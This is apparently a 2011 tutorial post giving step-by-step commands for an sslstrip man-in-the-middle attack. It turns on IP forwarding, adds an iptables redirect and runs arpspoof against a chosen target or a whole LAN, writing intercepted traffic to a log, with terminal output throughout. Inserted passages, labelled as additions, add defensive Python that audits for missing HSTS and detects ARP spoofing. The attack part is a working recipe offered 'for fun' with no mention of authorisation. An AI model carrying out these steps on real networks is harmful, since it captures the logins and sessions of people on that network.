itnetsec

Setting up sslstrip for man in the middle attacks

Dec 5th, 2011
This tutorial will show you how to set up sslstrip. sslstrip transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Aren't you excited?!
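
The mapping described above only works on HTTPS links and redirects that reach the browser over plaintext HTTP. The following is an added example, not part of the original paste and not sslstrip code: a small audit that lists those upgrade points in a site's plaintext response and checks whether the site's HTTPS responses set HSTS, the standard browser-side mitigation (HSTS is not mentioned in the paste). The sample responses, host names and function names are constructed for illustration.

```python
import re
from email.parser import Parser

# Constructed sample: a page served over plaintext HTTP that links to HTTPS.
HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=abc123; Path=/; HttpOnly\r\n"
    "\r\n"
    '<a href="https://shop.example/login">Sign in</a>\n'
    '<form action="https://shop.example/pay" method="post"></form>\n'
    '<img src="http://shop.example/logo.png">\n'
)
# Constructed samples: headers the same site returns over HTTPS.
HTTPS_HEADERS_NO_HSTS = "Content-Type: text/html\r\n\r\n"
HTTPS_HEADERS_HSTS = (
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n\r\n"
)

LINK_RE = re.compile(r'''(?:href|src|action)\s*=\s*["'](https://[^"']+)''', re.I)


def upgrade_points(raw_response):
    """Return (https_refs, cookies_without_secure) found in a plaintext response."""
    head, _, body = raw_response.partition("\r\n\r\n")
    header_text = head.split("\r\n", 1)[1] if "\r\n" in head else ""
    headers = Parser().parsestr(header_text, headersonly=True)
    refs = []
    location = headers.get("Location", "")
    if location.lower().startswith("https://"):
        refs.append(("redirect", location))
    refs += [("link", url) for url in LINK_RE.findall(body)]
    # Cookies without the Secure flag are also sent over a downgraded connection.
    cookies = [c for c in headers.get_all("Set-Cookie", [])
               if not re.search(r";\s*secure\b", c, re.I)]
    return refs, cookies


def hsts_max_age(raw_https_headers):
    """Return the HSTS max-age in seconds, or 0 when the header is missing."""
    headers = Parser().parsestr(raw_https_headers, headersonly=True)
    value = headers.get("Strict-Transport-Security", "")
    match = re.search(r"max-age\s*=\s*\"?(\d+)", value, re.I)
    return int(match.group(1)) if match else 0


def exposed(raw_response, raw_https_headers):
    """True when plaintext upgrade points exist and HSTS does not pin HTTPS."""
    refs, cookies = upgrade_points(raw_response)
    return bool(refs or cookies) and hsts_max_age(raw_https_headers) == 0
```

Even with HSTS set, a browser's first visit to the site is not covered unless the domain is on the browser preload list.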

Open a terminal window

Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'

100%[====================================================================================>] 22,198 --.-K/s in 0.07s

2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT

Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT

You also need to make sure you have Python 2.5 or greater and the Python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web

In my case they were already installed:

#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT

Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9

#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING lock.ico README setup.py sslstrip sslstrip.py
#END TERMINAL OUTPUT

Run the command:
python ./setup.py install

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT

Now we need to turn on IP forwarding. Run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward

OK, iptables has to be set up to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000

Now we are going to execute sslstrip. Run this command:
sslstrip -a -l 30000 -w secret.log

The listening port will be whatever you chose for iptables to redirect HTTP traffic to.

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log

sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT

Notice in the terminal output above that sslstrip is running. Don't kill the terminal session.

Open a new terminal window.

Now we need to set up arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

If you don't know your interface setting, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the network's real gateway/router; this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN, run:
arpspoof -i <interface> <gatewayIP>

So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254

#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
#END TERMINAL OUTPUT

Notice in the terminal output above that you will constantly receive ARP replies; just let it run. Don't kill the terminal session.
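
The output above is what a monitoring host on the same LAN sees on the wire: unsolicited ARP replies, addressed to broadcast, in which a new MAC keeps claiming the gateway's IP. The following is an added example, not part of the original paste: a detector that reads ARP reply lines in that same text format and flags a gateway binding that contradicts a trusted IP-to-MAC table. The sample lines, the trusted gateway MAC and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the line format shown above: one genuine unicast
# reply from the gateway, then repeated broadcast replies in which a
# different MAC claims the gateway IP.
SAMPLE = """\
0:50:56:c0:0:8 0:1c:42:11:22:33 0806 42: arp reply 10.10.1.254 is-at 0:50:56:c0:0:8
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
""".splitlines()
TRUSTED = {"10.10.1.254": "00:50:56:c0:00:08"}  # assumed known-good gateway MAC

ARP_RE = re.compile(
    r"^(?P<src>[0-9a-f:]+) (?P<dst>[0-9a-f:]+) 0806 \d+: "
    r"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]+)$", re.I)


def norm_mac(mac):
    """Zero-pad each octet: 0:c:29:39:6c:79 -> 00:0c:29:39:6c:79."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))


def find_arp_anomalies(lines, trusted, burst=3):
    """Return alerts as (kind, ip, mac); trusted maps IP -> known-good MAC."""
    trusted = {ip: norm_mac(mac) for ip, mac in trusted.items()}
    seen = defaultdict(set)        # ip -> MACs that have claimed it
    broadcast = defaultdict(int)   # (ip, mac) -> replies sent to broadcast
    alerts = []
    for line in lines:
        m = ARP_RE.match(line.strip())
        if not m:
            continue
        ip, mac = m["ip"], norm_mac(m["mac"])
        if ip in trusted and mac != trusted[ip] and mac not in seen[ip]:
            alerts.append(("binding-mismatch", ip, mac))
        elif seen[ip] and mac not in seen[ip]:
            alerts.append(("ip-moved", ip, mac))
        seen[ip].add(mac)
        # Normal replies are unicast to the requester; a steady stream of
        # replies to broadcast for one binding is worth an alert of its own.
        if norm_mac(m["dst"]) == "ff:ff:ff:ff:ff:ff":
            broadcast[(ip, mac)] += 1
            if broadcast[(ip, mac)] == burst:
                alerts.append(("broadcast-reply-burst", ip, mac))
    return alerts
```

On managed switches, DHCP snooping combined with dynamic ARP inspection enforces the same trusted binding at the port level instead of only alerting on it.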

If you need additional help just run:
sslstrip --help

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
#END TERMINAL OUTPUT

That's it...have fun!